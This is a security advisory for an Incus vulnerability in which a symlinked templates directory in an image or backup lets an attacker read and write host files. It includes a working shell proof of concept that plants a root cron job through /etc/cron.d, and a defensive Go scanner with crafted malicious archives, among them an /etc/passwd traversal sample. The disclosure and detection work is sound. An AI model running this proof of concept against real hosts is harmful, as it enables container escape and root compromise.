CVE-2026-48752: Incus Arbitrary Host File Read and Write via templates/ Symlink
A malicious container image or instance backup can trick Incus into treating a symlink as its templates directory, letting an attacker read or overwrite any file on the host, including cron jobs that
The problem
Incus before 7.2.0 unpacks container images and restores instance backups without checking whether the top-level `templates` entry is a symlink.
For container images, `shared/archive/archive.go` blocks device nodes but does not reject a symlink at `templates/`. For instance backups, `driver_dir_volumes.go` calls `rsync.LocalCopy` with `-a` (archive mode) but omits `--safe-links`, so rsync faithfully copies the symlink across.
In both paths the attacker controls where Incus reads and writes template files on the host.
Proof of concept

```sh
#!/bin/sh
# --- malicious container image ---
set -eu
tmpdir=$(mktemp -d)
mkdir -p "${tmpdir}/img/rootfs"
# Point templates/ at an arbitrary host directory
ln -s /etc/cron.d "${tmpdir}/img/templates"
cat <<'EOF' >"${tmpdir}/img/metadata.yaml"
architecture: x86_64
creation_date: 1
properties:
  description: PoC templates symlink host afrw
EOF
cd "${tmpdir}/img"
tar --owner=0 --group=0 -f- -c * > ../afrw.tar
# Import and initialise - no special privileges needed beyond Incus API access
incus image import ../afrw.tar --alias afrw
incus init afrw afrw-pwn
# Write: drop a cron job that runs as root
printf '* * * * * root sh -c "id>/pwned"\n' \
  | incus config template create afrw-pwn poc-cron
# Read: list any file reachable under the symlink target
# incus config template show afrw-pwn <filename>
```

The root cause (CWE-73) is that neither the tar extraction path nor the rsync copy validates whether the `templates` directory entry inside the archive is a real directory or a symlink to an attacker-chosen host path.
Because Incus later reads and writes template files relative to that path, every subsequent `incus config template` operation transparently operates on the symlink target on the host filesystem. The fix in 7.2.0 adds an explicit symlink check for the `templates` entry during tar extraction (rejecting it when the resolved path escapes the destination) and passes `--safe-links` to rsync for the backup restore path, causing rsync to skip unsafe symlinks instead of copying them.
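The following is an added example, not Incus code and not the 7.2.0 patch: a stand-alone Go scanner that applies the same rule the fix describes to an image tarball before it is imported. It walks the tar headers, rejects a top-level `templates` entry that is a symlink whose resolved target leaves the unpack root, applies the same test to symlinks beneath `templates/`, and also rejects entry names that traverse upward. The function names and the three constructed archives (a malicious image with `templates -> /etc/cron.d`, a clean one, and one whose symlink escapes via `..`) are assumptions made for this example; it goes slightly beyond the page by also checking entries under `templates/`, not only the top-level entry.

```go
package main

import (
	"archive/tar"
	"bytes"
	"fmt"
	"io"
	"path"
	"strings"
)

// resolvedUnderRoot reports whether a symlink at entry `name` with target
// `linkname` still resolves inside the archive root. Absolute targets and
// relative targets that climb above the root are treated as escapes.
func resolvedUnderRoot(name, linkname string) bool {
	if path.IsAbs(linkname) {
		return false
	}
	target := path.Join(path.Dir(name), linkname)
	return target != ".." && !strings.HasPrefix(target, "../")
}

// CheckImageArchive scans a container image tarball and returns an error if
// the `templates` entry (or anything under it) is a symlink that escapes the
// unpack root, or if any entry name traverses outside the root.
// This is a hypothetical pre-import check, not the Incus implementation.
func CheckImageArchive(r io.Reader) error {
	tr := tar.NewReader(r)
	for {
		hdr, err := tr.Next()
		if err == io.EOF {
			return nil
		}
		if err != nil {
			return err
		}
		if strings.HasPrefix(hdr.Name, "/") {
			return fmt.Errorf("absolute entry name %q", hdr.Name)
		}
		name := path.Clean(hdr.Name) // "./templates/" -> "templates"
		if name == ".." || strings.HasPrefix(name, "../") {
			return fmt.Errorf("entry %q traverses outside the archive root", hdr.Name)
		}
		inTemplates := name == "templates" || strings.HasPrefix(name, "templates/")
		if inTemplates && hdr.Typeflag == tar.TypeSymlink && !resolvedUnderRoot(name, hdr.Linkname) {
			return fmt.Errorf("symlink %q -> %q would redirect template I/O to the host", name, hdr.Linkname)
		}
	}
}

// entry describes one constructed tar member used to build sample archives.
type entry struct {
	name     string
	typeflag byte
	linkname string
	body     string
}

// buildTar assembles an in-memory tarball from constructed entries.
func buildTar(entries []entry) []byte {
	var buf bytes.Buffer
	tw := tar.NewWriter(&buf)
	for _, e := range entries {
		hdr := &tar.Header{Name: e.name, Typeflag: e.typeflag, Linkname: e.linkname, Mode: 0o644}
		if e.typeflag == tar.TypeReg {
			hdr.Size = int64(len(e.body))
		}
		if err := tw.WriteHeader(hdr); err != nil {
			panic(err)
		}
		if e.typeflag == tar.TypeReg {
			if _, err := io.WriteString(tw, e.body); err != nil {
				panic(err)
			}
		}
	}
	if err := tw.Close(); err != nil {
		panic(err)
	}
	return buf.Bytes()
}

// MaliciousImage is a constructed image whose templates entry is a symlink
// to a host directory, mirroring the shape of the advisory's PoC.
func MaliciousImage() []byte {
	return buildTar([]entry{
		{name: "metadata.yaml", typeflag: tar.TypeReg, body: "architecture: x86_64\n"},
		{name: "rootfs/", typeflag: tar.TypeDir},
		{name: "templates", typeflag: tar.TypeSymlink, linkname: "/etc/cron.d"},
	})
}

// CleanImage is a constructed image with a real templates directory.
func CleanImage() []byte {
	return buildTar([]entry{
		{name: "metadata.yaml", typeflag: tar.TypeReg, body: "architecture: x86_64\n"},
		{name: "rootfs/", typeflag: tar.TypeDir},
		{name: "templates/", typeflag: tar.TypeDir},
		{name: "templates/hostname.tpl", typeflag: tar.TypeReg, body: "{{ container.name }}\n"},
	})
}

// TraversingImage is a constructed image whose templates/ contains a
// relative symlink that climbs out of the unpack root.
func TraversingImage() []byte {
	return buildTar([]entry{
		{name: "templates/", typeflag: tar.TypeDir},
		{name: "templates/x", typeflag: tar.TypeSymlink, linkname: "../../../etc/passwd"},
	})
}

func main() {
	samples := []struct {
		label string
		img   []byte
	}{
		{"malicious (templates -> /etc/cron.d)", MaliciousImage()},
		{"clean", CleanImage()},
		{"traversing (templates/x -> ../../../etc/passwd)", TraversingImage()},
	}
	for _, s := range samples {
		fmt.Printf("%-50s %v\n", s.label, CheckImageArchive(bytes.NewReader(s.img)))
	}
}
```

Symlinks under `rootfs/` are deliberately left alone: absolute links such as `/lib -> /usr/lib` are normal inside a container root and are resolved relative to the container at runtime, whereas `templates/` is read and written by the host daemon, which is why only that subtree needs the escape check. The equivalent guard for the backup restore path is rsync's `--safe-links` flag, which the 7.2.0 fix adds.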
The fix
Upgrade `github.com/lxc/incus/v7` to version 7.2.0 or later. The patch adds symlink validation in `shared/archive/archive.go` for the image unpack path and adds `--safe-links` to the rsync arguments in `internal/server/storage/drivers/driver_dir_volumes.go` for the backup restore path.
No configuration workaround exists for earlier versions; restrict Incus API access to trusted users only as a partial mitigation.